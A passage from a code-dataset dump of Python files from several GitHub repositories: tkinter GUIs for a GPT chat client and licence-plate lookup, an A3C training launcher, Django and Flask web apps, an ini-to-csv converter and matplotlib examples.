add_chat(GPT3_add_prompt + text, chat_history, model_in_mode[selected_model], \"user\")\n #导入模式\n elif selected_mode == mode_dict[1]:\n if chat_history_format == format_list[0]:\n #若从功能转导入,则为之前历史训练的延续,不需要添加prompt\n add_chat(text, chat_history, model_in_mode[selected_model], \"user\")\n elif chat_history_format == format_list[1]:\n #若从功能转导入,则为无prompt的对话。\n add_chat(\"\", chat_history, model_in_mode[selected_model], \"system\")\n add_chat(text, chat_history, model_in_mode[selected_model], \"user\")\n\n # 交给GPT回答\n answer = askGPT(messages=chat_history, MODEL=selected_model, MODEL_use_mode=chat_history_format,\n temperature=temperature, max_tokens=max_token)\n # AI回答\n add_chat(answer, chat_history, model_in_mode[selected_model], \"assistant\")\n else:\n # 报错显示格式有误\n Message_box.config(state=tk.NORMAL)\n Message_box.delete(\"1.0\", \"end\")\n Message_box.insert(tk.END, \"历史对话与模型不匹配\")\n Message_box.config(state=tk.DISABLED)\n Dialog_box.see(tk.END)\n\ndef sumbit_text(event):\n # -------------------------------提交用户输入参数----------------------------------------#\n text, temperature, max_token, selected_model, selected_prompt,\\\n selected_mode= submit_user_parameter()\n # -------------------------------------------------------------------------------------#\n # 如果对话记录为空,就初始化对话记录\n if chat_history == [] and selected_mode == mode_dict[0]:\n # 如果对话记录为空,就添加用户输入\n add_chat(prompts[selected_prompt],\n chat_history, model_in_mode[selected_model], \"system\")\n\n check_and_sendGPT(text, temperature, max_token, selected_model, selected_prompt,selected_mode)\n\n# 提交按钮\nsubmit_button = tk.Button(window,\n text=\"提交\",\n width=submit_button_size[0],\n height=submit_button_size[1],\n command=lambda: sumbit_text(None),\n )\n\n# 按钮的字体\nsubmit_button.config(\n font=(font_style, font_size),\n background=colors[6],\n activebackground=colors[3],\n foreground=colors[7],\n)\n\nif __name__ == \"__main__\":\n submit_button.grid(row=1, column=0, sticky=tk.NSEW)\n window.mainloop()\n","repo_name":"Code-WSY/GPT-SY","sub_path":"script/Bottom_Submit.py","file_name":"Bottom_Submit.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16656156330","text":"import argparse\nfrom pathlib import Path\n\nimport numpy as np\nimport ubelt as ub\nfrom imageio import imread, imwrite\nfrom tqdm import tqdm\nfrom safeforest.config import REMAP_MAP\n\n\"\"\"\nremap classes\n\"\"\"\n# Taken from https://www.geeksforgeeks.org/python-key-value-pair-using-argparse/\n# create a keyvalue class\nclass keyvalue(argparse.Action):\n # Constructor calling\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, dict())\n\n for value in values:\n # split it into key and value\n key, value = value.split(\"=\")\n # assign into dictionary\n getattr(namespace, self.dest)[int(key)] = int(value)\n\n\ndef remap_image(input_file: str, output_file: str, remap: str):\n \"\"\"Takes in a filename and writes out a remapped version\n\n Args:\n input_file: where to read the file from\n output_file: where to write the data to\n \"\"\"\n img = imread(input_file)\n remapped_img = remap[img].astype(np.uint8)\n ub.ensuredir(output_file.parents[0], mode=0o0755)\n imwrite(output_file, remapped_img)\n\n\ndef main(annotation_dir, output_dir, remap_name: str):\n \"\"\"\n remap_name: specifying the remapping strategy \n \"\"\"\n numpy_remap = REMAP_MAP[remap_name]\n\n input_files = list(annotation_dir.glob(\"**/*.png\"))\n output_files = [x.relative_to(annotation_dir) for x in input_files]\n output_files = [Path(output_dir, x) for x in output_files]\n [\n remap_image(i_f, o_f, numpy_remap)\n for i_f, o_f in tqdm(zip(input_files, output_files), total=len(input_files))\n ]\n\n\ndef merge_datasets(img_folders, ann_folders, output_folder):\n raise NotImplementedError()\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\"Remap indices in a given dataset\")\n parser.add_argument(\n \"--annotation-dir\",\n type=Path,\n required=True,\n help=\"The top level directory containing all the annotations\",\n )\n parser.add_argument(\n \"--output-dir\",\n type=Path,\n required=True,\n help=\"Where to write the remapped data. The structure will be the same as the input\",\n )\n parser.add_argument(\"--remap-name\", choices=REMAP_MAP.keys())\n args = parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args.annotation_dir, args.output_dir, args.remap_name)\n","repo_name":"russelldj/SafeForest","sub_path":"dev/dataset_creation/remap_dataset.py","file_name":"remap_dataset.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22369611595","text":"from tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter import messagebox\r\nfrom tkinter import ttk\r\nfrom ttkthemes import themed_tk as tk\r\n\r\nfrom PIL import ImageTk, Image\r\n\r\nimport scanForPlateNumber as scanPlate\r\nimport database as database\r\ntitle=\"Number Plate Recognition\"\r\n\r\n\r\ndef ScanPage(frame, raised_frame, homePage):\r\n\r\n heading = Label(frame, text=title, bg=\"#fff\", fg=\"#282935\", width=25, height=3, font=('arial', 25, 'bold'), )\r\n heading.place(x=0, y=0)\r\n\r\n backButton = Button(frame, text=\"Back\", bg=\"#fff\", fg=\"#282935\", width=5, font=('arial', 12, 'bold'),\r\n command=lambda: raised_frame(homePage))\r\n backButton.place(x=50, y=460)\r\n\r\n WIDTH = 300\r\n HEIGHT = 300\r\n\r\n imageLabel = Label(frame)\r\n imageLabel.place(x=10, y=140)\r\n\r\n def displayImage(filename):\r\n if(filename):\r\n IM = Image.open(filename).resize((WIDTH, HEIGHT), Image.ANTIALIAS)\r\n # Creates a Tkinter-compatible photo image, which can be used everywhere Tkinter expects an image object.\r\n img = ImageTk.PhotoImage(IM)\r\n imageLabel.image = img # <== this is were we anchor the img object\r\n imageLabel.configure(image=img)\r\n dirLabel['text'] = filename\r\n scanImageButton[\"state\"]=\"normal\"\r\n\r\n\r\n\r\n def scanImage():\r\n path = dirLabel['text']\r\n print(scanPlate.main(path))\r\n plateNumber = scanPlate.main(path)\r\n plateLabel['text'] = plateNumber\r\n seacrchDatabaseButton[\"state\"] = \"normal\"\r\n\r\n\r\n def fileDialog():\r\n filename = filedialog.askopenfilename(initialdir=\"/\", title=\"Select A File\", filetype=\r\n ((\"jpeg files\", \"*.jpg\"), (\"all files\", \"*.*\")))\r\n displayImage(filename)\r\n\r\n def searchDatabase():\r\n report, dates = database.search(plateLabel['text'])\r\n if(report):\r\n\r\n newWindow = Tk()\r\n date_frame = Frame(newWindow, width=300, height=200, background=\"#282935\")\r\n date_frame.place(x=330, y=60)\r\n newWindow.wm_minsize(500, 300)\r\n newWindow.wm_maxsize(500, 300)\r\n newWindow.configure(background=\"#282935\", )\r\n\r\n scroll = Scrollbar(date_frame)\r\n scroll.pack(side=\"right\", fill=\"y\")\r\n\r\n list = Listbox(date_frame, )\r\n list.pack(side=\"left\", fill=\"y\")\r\n newPlateLabel = Label(newWindow, text=\"LICENSE NUMBER:\", bg=\"#282935\", fg=\"#fff\",\r\n font=('arial', 15, 'bold'))\r\n newPlateLabel.place(x=20, y=10)\r\n newPlateLabel = Label(newWindow, text=\"OWNER NAME:\", bg=\"#282935\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n newPlateLabel.place(x=20, y=70)\r\n newPlateLabel = Label(newWindow, text=\"CAR NAME:\", bg=\"#282935\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n newPlateLabel.place(x=20, y=130)\r\n newPlateLabel = Label(newWindow, text=\"DATE CREATED:\", bg=\"#282935\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n newPlateLabel.place(x=20, y=190)\r\n newPlateLabel = Label(newWindow, text=\"VIEWED DATE:\", bg=\"#282935\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n newPlateLabel.place(x=300, y=30)\r\n\r\n newPlateLabelValue = Label(newWindow, text=report[0][0], bg=\"#282935\", fg=\"#aaa\",\r\n font=('arial', 15, 'bold'))\r\n newPlateLabelValue.place(x=40, y=40)\r\n newPlateLabelValue = Label(newWindow, text=report[0][1], bg=\"#282935\", fg=\"#aaa\",\r\n font=('arial', 15, 'bold'))\r\n newPlateLabelValue.place(x=40, y=100)\r\n newPlateLabelValue = Label(newWindow, text=report[0][2], bg=\"#282935\", fg=\"#aaa\",\r\n font=('arial', 15, 'bold'))\r\n newPlateLabelValue.place(x=40, y=160)\r\n newPlateLabelValue = Label(newWindow, text=report[0][3], bg=\"#282935\", fg=\"#aaa\",\r\n font=('arial', 15, 'bold'))\r\n newPlateLabelValue.place(x=40, y=220)\r\n a = 1\r\n for data in dates:\r\n list.insert(a, str(a) + \"). \" + data[0] + \" \")\r\n a = 1 + a\r\n\r\n scroll.config(command=list.yview)\r\n list.config(yscrollcommand=scroll.set)\r\n newWindow.mainloop()\r\n\r\n # messagebox.showinfo('Message', \"Lincense number exist in database\")\r\n else:\r\n messagebox.showinfo('Message', \"Lincense number is not in database\")\r\n\r\n\r\n return\r\n\r\n\r\n browseButton = Button(frame, text=\"Browse file\", bg=\"#fff\", fg=\"#282935\", font=('arial', 12, 'bold'),\r\n command=fileDialog)\r\n browseButton.place(x=320, y=160)\r\n\r\n scanImageButton = Button(frame, text=\"Scan Image For Plate\", state=DISABLED, bg=\"#fff\", fg=\"#282935\", font=('arial', 12, 'bold'),\r\n command=scanImage)\r\n scanImageButton.place(x=320, y=200)\r\n\r\n scanHeading = Label(frame, text=\"Plate Number:\", bg=\"#282935\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n scanHeading.place(x=320, y=250)\r\n\r\n plateLabel = Label(frame, text=\"\", bg=\"#282935\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n plateLabel.place(x=320, y=280)\r\n\r\n seacrchDatabaseButton = Button(frame, text=\"Search Database\", state=DISABLED, bg=\"#fff\", fg=\"#282935\", font=('arial', 12, 'bold'),\r\n command=searchDatabase)\r\n seacrchDatabaseButton.place(x=320, y=360)\r\n\r\n\r\n dirLabel = Label(frame, text=\"\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n\r\n\r\n","repo_name":"EhisEA/license-plate-detector","sub_path":"Licensed Plate Recognition/scanImage.py","file_name":"scanImage.py","file_ext":"py","file_size_in_byte":5571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19111687858","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nfrom multiprocessing import RawArray, Barrier, Lock\nimport tensorflow as tf\nimport logging_utils\nimport time\nfrom shared_utils import SharedCounter, SharedVars\nimport ctypes\nimport argparse\nfrom policy_based_actor_learner import *\n\nlogger = logging_utils.getLogger('main')\n\n\ndef main(args):\n logger.debug('Config: {}'.format(args))\n\n \"\"\" Set up the graph, the agents, and run the agents in parallel. \"\"\"\n import atari_environment\n num_actions, _, _ = atari_environment.get_actions(args.game)\n\n args.summ_base_dir = 'train_data/sum_log/{}/{}'.format(args.game, time.time())\n\n args.learning_vars = SharedVars(num_actions)\n if args.opt_mode == 'shared':\n args.opt_state = SharedVars(num_actions, opt_type=args.opt_type, lr=args.initial_lr)\n else:\n args.opt_state = None\n\n args.cts_updated = RawArray(ctypes.c_int, args.num_actor_learners)\n args.cts_lock = Lock()\n args.cts_sync_steps = 20 * 30000 # @tensorflow-rl 20*q_target_update_steps\n\n args.barrier = Barrier(args.num_actor_learners)\n args.global_step = SharedCounter(0)\n args.num_actions = num_actions\n\n if (args.visualize == 2): args.visualize = 0\n actor_learners = []\n for i in range(args.num_actor_learners):\n if (args.visualize == 2) and (i == args.num_actor_learners - 1):\n args.args.visualize = 1\n\n args.actor_id = i\n\n actor_learners.append(A3CLearner(args))\n actor_learners[-1].start()\n\n for t in actor_learners:\n t.join()\n\n logger.debug('All training threads finished')\n logger.debug('All threads stopped')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('game', help='Name of game')\n parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')\n parser.add_argument('-v', '--visualize', default=0, type=int,\n help='0: no visualization of emulator; 1: all emulators, for all actors, are visualized; 2: only 1 emulator (for one of the actors) is visualized. Default = 0',\n dest='visualize')\n\n parser.add_argument('--opt_type', default='rmsprop',\n help='Type of optimizer: rmsprop, momentum, adam. Default = rmsprop', dest='opt_type')\n parser.add_argument('--opt_mode', default='shared',\n help='Whether to use \\'local\\' or \\'shared\\' vector(s) for the moving average(s). Default = shared',\n dest='opt_mode')\n\n # consistent with tensorflow beta1, beta2\n parser.add_argument('--b1', default=0.9, type=float, help='beta1 for the Adam optimizer. Default = 0.9', dest='b1')\n parser.add_argument('--b2', default=0.999, type=float, help='beta2 for the Adam optimizer. Default = 0.999',\n dest='b2')\n # TODO @tensorpack AdamOptimizer's epsilon = 1e-3. tensorflow default is 1e-08\n # TODO tensorflow default for RMSPropOptimizer is epsilon=1e-10\n parser.add_argument('--e', default=0.001, type=float,\n help='Epsilon for the Rmsprop and Adam optimizers. Default = 1e-3', dest='e')\n # TODO tensorflow default for RMSPropOptimizer is decay=0.9\n parser.add_argument('--alpha', default=0.9, type=float,\n help='Discounting factor for the history/coming gradient, for the Rmsprop optimizer. Default = 0.9',\n dest='alpha')\n\n parser.add_argument('-lra', '--lr_annealing_steps', default=80000000, type=int,\n help='Number of global steps during which the learning rate will be linearly annealed towards zero. Default = 80*10^6',\n dest='lr_annealing_steps')\n parser.add_argument('-n', '--num_actor_learners', default=16, type=int,\n help='number of actors (processes). Default = 16', dest='num_actor_learners')\n parser.add_argument('--max_global_steps', default=80000000, type=int,\n help='Max number of training steps. Default = 80*10^6', dest='max_global_steps')\n\n args = parser.parse_args()\n if args.gpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n\n args.initial_lr = 0.001 # tensorpack\n args.max_local_steps = 32 # @lezhang batch_size\n\n args.opt_type = 'rmsprop'\n args.opt_mode = 'shared'\n args.e = 1e-3\n\n args.alg_type = 'a3c'\n args.gamma = 0.99\n main(args)\n","repo_name":"lezhang-thu/rlearning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25727344825","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib import messages\nfrom .models import *\nimport bcrypt\n# Create your views here.\n\n\ndef root(request):\n if 'username' in request.session:\n logged_user = User.objects.get(id=request.session['userid'])\n context = {\n 'paints': Paint.objects.all(),\n 'userpaints': logged_user.purchased_paints.all()\n }\n\n return render(request, 'index.html', context)\n else:\n return redirect('/loginpage')\n\n\ndef loginpage(request):\n return render(request, 'loginpage.html')\n\n\ndef signup(request):\n errors = User.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/loginpage')\n else:\n password = request.POST['password']\n pw_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt()).decode()\n User.objects.create(first_name=request.POST['fname'],\n last_name=request.POST['lname'],\n email=request.POST['email'],\n password=pw_hash)\n request.session['username'] = User.objects.last(\n ).first_name + \" \" + User.objects.last().last_name\n request.session['userid'] = User.objects.last().id\n\n return redirect('/success')\n\n\ndef signin(request):\n user = User.objects.filter(email=request.POST['email'])\n if user:\n if bcrypt.checkpw(request.POST['password'].encode(), user[0].password.encode()):\n request.session['username'] = user[0].first_name + \\\n ' ' + user[0].last_name\n request.session['userid'] = user[0].id\n return redirect('/success')\n else:\n messages.error(request, \"Wrong Password\")\n return redirect('/loginpage')\n else:\n messages.error(request, \"Email not found in the database\")\n return redirect('/loginpage')\n\n\ndef success(request):\n if 'username' in request.session:\n return redirect('/')\n else:\n return redirect('/loginpage')\n\n\ndef logout(request):\n request.session.flush()\n return redirect('/')\n\n\ndef addpainting(request):\n\n if 'username' in request.session:\n return render(request, \"addpaint.html\")\n else:\n return redirect('/')\n\n\ndef addpaintsubmit(request):\n errors = Paint.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/addpainting')\n else:\n logged_user = User.objects.get(id=request.session['userid'])\n Paint.objects.create(title=request.POST['title'],\n desc=request.POST['desc'],\n price=request.POST['price'],\n qts=request.POST['qts'],\n add_by=logged_user)\n return redirect('/')\n\n\ndef edit(request, id):\n if 'username' in request.session:\n context = {\n 'paint': Paint.objects.get(id=id)\n }\n return render(request, 'editpaint.html', context)\n else:\n return redirect('/')\n\n\ndef editsubmit(request, id):\n if 'username' in request.session:\n if int(request.session['userid']) == Paint.objects.get(id=id).add_by.id:\n errors = Paint.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/paint/'+str(id)+'/edit')\n else:\n paint = Paint.objects.get(id=id)\n paint.title = request.POST['title']\n paint.desc = request.POST['desc']\n paint.price = request.POST['price']\n paint.qts = qts = request.POST['qts']\n paint.save()\n return redirect('/paint/'+str(id))\n else:\n return redirect('/')\n\n\ndef delete(request, id):\n if 'username' in request.session:\n if int(request.session['userid']) == Paint.objects.get(id=id).add_by.id:\n paint = Paint.objects.get(id=id)\n paint.delete()\n return redirect('/')\n else:\n return redirect('/')\n else:\n return redirect('/')\ndef paintdetails(request, id):\n if 'username' in request.session:\n paint = Paint.objects.get(id=id)\n numberOfPurchase = len(\n list(Paint.objects.get(id=id).purchased_by.all()))\n paint_qts = int(paint.qts)\n context = {\n 'paint': paint,\n 'buyable': paint_qts > numberOfPurchase,\n 'numberOfPurchase': numberOfPurchase,\n }\n return render(request, 'paint.html', context)\n else:\n return redirect('/')\n\n\ndef buy(request, id):\n paint = Paint.objects.get(id=id)\n logged_user = User.objects.get(id=request.session['userid'])\n paint.purchased_by.add(logged_user)\n return redirect('/')\n","repo_name":"Mahdi-Saqqa/python-exam","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19840166761","text":"# Author: Soumil Datta\nfrom typing import Dict, List\nimport os\nimport sys\n\nmasterHeaderList = ['INIFileName']\n\ndef _getMasterHeaderListFromINI(fileList: List[str]) -> List[str]:\n '''Make a pass through all files adding to the master header list'''\n for inputFile in fileList:\n with open(inputFile) as currentFile:\n for line in currentFile:\n key = line.split(\"=\")[0].strip()\n if not key in masterHeaderList:\n masterHeaderList.append(key)\n return masterHeaderList\n\n\ndef _getValueDictFromINI(filename: str) -> Dict[str, str]:\n '''Returns a string list of the values in a specified ini file'''\n fileDict = {}\n with open(filename) as inputFile:\n for line in inputFile:\n entry = line.split('=')\n key = entry[0].strip()\n value = entry[1].strip()\n fileDict[key] = value\n return fileDict\n\n\ndef _formatCSVLine(list: List[str]) -> str:\n '''Adds the proper commas and spaces to a list of strings'''\n string = list[0]\n for i in range(1, len(list)):\n string += f\", {list[i]}\"\n return string\n\n\ndef _processValueDictToString(filename: str, valueDict: Dict[str, str]) -> str:\n '''Uses the key, value dictionary to check against the masterHeaderList and output the string'''\n string = filename\n for i in range(1, len(masterHeaderList)):\n key = masterHeaderList[i]\n # add nothing if value does not exist for key\n string += f\", {valueDict.get(key, '')}\"\n return string\n\ndef _write_to_csv(outputFile: str, fileList: List[str]):\n '''Writes entries for each file into the output CSV file'''\n with open(outputFile, 'w') as outputFile:\n outputFile.write(_formatCSVLine(_getMasterHeaderListFromINI(fileList)))\n outputFile.write('\\n')\n\n for inputFile in fileList:\n # Get the filename for the first column\n filename = inputFile.split('/')[1]\n valueDict = _getValueDictFromINI(inputFile)\n outputFile.write(_processValueDictToString(filename, valueDict))\n outputFile.write('\\n')\n\ndef process_folder(folder_name: str, output_filename: str):\n '''Processes a folder of .ini files into an output .csv file'''\n files = [f'{folder_name}/{file}' for file in os.listdir(folder_name)]\n _write_to_csv(output_filename, files)\n\ndef process_files(file_names: List[str], output_filename: str):\n '''Process a list of .ini files into an output .csv file'''\n _write_to_csv(output_filename, file_names)","repo_name":"soumildatta/ini2csv","sub_path":"ini2csv/ini2csv.py","file_name":"ini2csv.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40511547073","text":"from django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.core.paginator import Paginator\n\nimport csv\n\n\nclass Station:\n def __init__(self, name, street, district):\n self.Name = name\n self.Street = street\n self.District = district\n\n\ndef index(request):\n return redirect(reverse('bus_stations'))\n\n\ndef bus_stations(request):\n # получите текущую страницу и передайте ее в контекст\n # также передайте в контекст список станций на странице\n bus_stations = []\n\n with open(settings.BUS_STATION_CSV, encoding='utf-8') as f:\n reader = csv.DictReader(f)\n for row in reader:\n bus_stations.append(Station(row['Name'], row['Street'], row['District']))\n\n page_number = int(request.GET.get('page', default=1))\n paginator = Paginator(bus_stations, 10)\n page = paginator.get_page(page_number)\n \n context = {\n 'bus_stations': page,\n 'page': page,\n }\n\n return render(request, 'stations/index.html', context)\n","repo_name":"ablsft/dj-homeworks","sub_path":"1.2-requests-templates/pagination/stations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26801252007","text":"from flask import jsonify, url_for, request, g, abort\nfrom app import db\nfrom app.models import Usuario, Personaje, HabilidadBase, HabilidadPersonaje\nfrom app.api.v1 import bp\nfrom app.api.v1.errores import peticion_erronea\nfrom app.api.v1.auth import token_auth\nfrom app.api.v1.firebase import Firebase\n\n\n'''\n End point: Obtener personaje\n @param: URL => idPersonaje, id del personaje.\n @return: Response => datos del personaje en formato JSON.\n'''\n@bp.route('/personajes/', methods=['GET'])\n@token_auth.login_required\ndef obtener_personaje(idPersonaje):\n return jsonify(Personaje.query.get_or_404(idPersonaje).to_dict())\n\n\n'''\n End point: Obtener todas las habilidades del personaje\n @param: URL => idPersonaje, id del personaje.\n @return: Response => datos de todas las habilidades del personaje en formato JSON.\n'''\n@bp.route('/personajes//habilidades', methods=['GET'])\n@token_auth.login_required\ndef obtener_habilidades_personaje(idPersonaje):\n habilidades = Personaje.query.get_or_404(idPersonaje).habilidades\n respuesta = []\n for habilidad in habilidades:\n hb = HabilidadBase.query.filter_by(idHabilidad = habilidad.habilidad_id)\n dato = {\n 'idHabilidadPersonaje': habilidad.idHabilidadPersonaje,\n 'idHabilidad': habilidad.habilidad_id,\n 'idPersonaje': habilidad.personaje_id,\n 'nombre': hb.nombre,\n 'bonusPrincipal': hb.bonusPrincipal,\n 'bonusSecundario': hb.bonusSecundario,\n 'combate': hb.combate,\n 'tipo': hb.tipo,\n 'valorBase': habilidad.valorBase,\n 'pap': habilidad.pap,\n 'extra': habilidad.extra,\n 'habilidadUsada': habilidad.habilidadUsada,\n }\n respuesta.append(dato)\n return jsonify(respuesta)\n\n\n'''\n End point: Obtener una habilidad del personaje\n @param: URL => idPersonaje, id del personaje.\n @param: URL => idHabilidadPersonaje, id de la habilidad del personaje.\n @return: Response => datos de la habilidad del personaje en formato JSON.\n'''\n@bp.route('/personajes//habilidades/', methods=['GET'])\n@token_auth.login_required\ndef obtener_habilidad_personaje(idPersonaje, idHabilidadPersonaje):\n personaje = Personaje.query.get_or_404(idPersonaje)\n habilidad = HabilidadPersonaje.query.get_or_404(idHabilidadPersonaje) or None\n if g.usuario_actual.idUsuario != personaje.usuario_id:\n abort(403)\n if personaje is None:\n return peticion_erronea('El personaje no existe.')\n if habilidad is None:\n return peticion_erronea('El personaje aún no ha aprendido esta habilidad.')\n else:\n respuesta = jsonify(habilidad.to_dict())\n respuesta.status_code = 201\n respuesta.headers['Location'] = url_for('api.obtener_habilidad_personaje',\n idPersonaje=habilidad.personaje_id, idHabilidadPersonaje = habilidad.idHabilidadPersonaje)\n return respuesta\n\n\n'''\n End point: Obtener todos los personajes del usuario.\n @return: Response => datos de todos los personajes del usuario en formato JSON.\n'''\n@bp.route('/personajes', methods=['GET'])\n@token_auth.login_required\ndef obtener_personajes():\n personajes = Personaje.query.filter_by(\n usuario_id=g.usuario_actual.idUsuario)\n respuesta = []\n for personaje in personajes:\n respuesta.append(personaje.to_dict())\n return jsonify(respuesta)\n\n\n'''\n End point: Crear un personaje\n @param: Body => datos del personaje en formato JSON.\n @return: Response => datos del personaje en formato JSON.\n'''\n@bp.route('/personajes', methods=['POST'])\n@token_auth.login_required\ndef crear_personaje():\n datos = request.get_json() or {}\n if 'nombre' not in datos:\n return peticion_erronea('Debe incluir el campo nombre.')\n if Personaje.query.filter_by(nombre=datos['nombre'], idUsuario=g.usuario_actual.idUsuario).first():\n return peticion_erronea('El usuario ya tiene un personaje con este nombre.')\n datos['idPersonaje'] = Firebase.firebase_crear_personaje(datos)\n personaje = Personaje()\n personaje.from_dict(datos, g.usuario_actual.idUsuario)\n db.session.add(personaje)\n db.session.commit()\n Firebase.firebase_actualizar_usuario_personajes(Usuario.query.get_or_404(g.usuario_actual.idUsuario).personajes)\n respuesta = jsonify(personaje.to_dict())\n respuesta.status_code = 201\n respuesta.headers['Location'] = url_for('api.obtener_personaje', idPersonaje=personaje.idPersonaje)\n return respuesta\n\n\n'''\n End point: Aprender una habilidad el personaje\n @param: URL => idPersonaje, id del personaje.\n @param: URL => idHabilidad, id de la habilidad base a aprender.\n @return: Response => datos de la nueva habilidad del personaje en formato JSON.\n'''\n@bp.route('/personajes//habilidades/', methods=['POST'])\n@token_auth.login_required\ndef aprender_habilidades(idPersonaje, idHabilidad):\n personaje = Personaje.query.get_or_404(idPersonaje)\n if g.usuario_actual.idUsuario != personaje.usuario_id:\n abort(403)\n if personaje is None:\n return peticion_erronea('El personaje no existe.')\n if not HabilidadBase.query.filter_by(idHabilidad=idHabilidad).first():\n return peticion_erronea('La habilidad no existe.')\n datos = request.get_json() or {}\n if 'valorBase' not in datos or 'pap' not in datos or 'extra' not in datos or 'habilidadUsada' not in datos:\n return peticion_erronea('Debe incluir los campos valorBase, pap, extra y habilidadUsada.')\n datos['personaje_id'] = idPersonaje\n datos['habilidad_id'] = idHabilidad\n habilidad = HabilidadPersonaje()\n if habilidad.conocer_habilidad(datos):\n return peticion_erronea('El personaje ya ha aprendido esta habilidad anteriormente.')\n else:\n datos['idHabilidadPersonaje'] = Firebase.firebase_crear_habilidad(datos)\n habilidad.from_dict(datos)\n print(habilidad)\n db.session.add(habilidad)\n db.session.commit()\n respuesta = jsonify(habilidad.to_dict())\n respuesta.status_code = 201\n respuesta.headers['Location'] = url_for('api.obtener_habilidad_personaje',\n idPersonaje=habilidad.personaje_id, idHabilidadPersonaje = habilidad.idHabilidadPersonaje)\n return respuesta\n\n\n'''\n End point: Actualizar personaje\n @param: URL => idPersonaje, id del personaje.\n @return: Response => datos actualizados del personaje en formato JSON.\n'''\n@bp.route('/personajes/', methods=['PUT'])\n@token_auth.login_required\ndef actualizar_personaje(idPersonaje):\n personaje = Personaje.query.get_or_404(idPersonaje)\n if g.usuario_actual.idUsuario != personaje.usuario_id:\n abort(403)\n datos = request.get_json() or {}\n if 'idPersonaje' in datos:\n return peticion_erronea('No se puede cambiar el id del Personaje.')\n personaje.from_dict(datos, personaje.usuario_id)\n Firebase.firebase_actualizar_personaje(personaje)\n db.session.commit()\n return jsonify(personaje.to_dict())\n\n\n'''\n End point: Actualizar habilidad del personaje\n @param: URL => idPersonaje, id del personaje.\n @param: URL => idHabilidadPersonaje, id de la habilidad del personaje.\n @return: Response => datos de la habilidad actualizada del personaje en formato JSON.\n'''\n@bp.route('/personajes//habilidades/', methods=['PUT'])\n@token_auth.login_required\ndef actualizar_habilidades(idPersonaje, idHabilidadPersonaje):\n personaje = Personaje.query.get_or_404(idPersonaje) or None\n habilidad = HabilidadPersonaje.query.get_or_404(idHabilidadPersonaje) or None\n if g.usuario_actual.idUsuario != personaje.usuario_id:\n abort(403)\n if personaje is None:\n return peticion_erronea('El personaje no existe.')\n datos = request.get_json() or {}\n if not ('valorBase' in datos or 'pap' in datos or 'extra' in datos or 'habilidadUsada' in datos):\n return peticion_erronea('Debe incluir algunos de estos campos: valorBase, pap, extra o habilidadUsada.')\n if habilidad is None:\n return peticion_erronea('El personaje aún no ha aprendido esta habilidad.')\n else:\n habilidad.from_dict(datos)\n Firebase.firebase_actualizar_habilidad(datos)\n respuesta = jsonify(habilidad.to_dict())\n respuesta.status_code = 201\n respuesta.headers['Location'] = url_for('api.obtener_habilidad_personaje',\n idPersonaje=habilidad.personaje_id, idHabilidadPersonaje = habilidad.idHabilidadPersonaje)\n return respuesta\n\n","repo_name":"GuillermoGarcia/avispro-api","sub_path":"app/api/v1/personajes.py","file_name":"personajes.py","file_ext":"py","file_size_in_byte":8686,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2694900487","text":"# -*- coding:utf-8 -*-\n\"\"\"\n@project = 0527-2\n@file = matplotlib_1\n@author = Liangjisheng\n@create_time = 2018/5/27 0027 下午 17:33\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef simple_test():\n plt.figure(1) # 创建图表1\n plt.figure(2) # 创建图表2\n plt.show() # 显示所有图表\n\ndef simple_test2():\n plt.figure(1) # 创建图表1\n plt.subplot(223) # 创建2*2的图表矩阵,绘制的子图为矩阵中的3序号\n plt.show()\n\ndef simple_test3():\n plt.figure(1, dpi=50) # 创建图表1,dpi为设置图表的大小,默认dpi=80\n plt.subplot(221)\n plt.subplot(222)\n plt.subplot(223)\n plt.subplot(224)\n plt.show()\n\ndef simple_test4():\n \"\"\"在多个表中创建子图\"\"\"\n plt.figure(1, dpi=50)\n plt.subplot(111) # 在图表1中创建子图\n plt.figure(2, dpi=50)\n plt.subplot(221)\n plt.show()\n\ndef 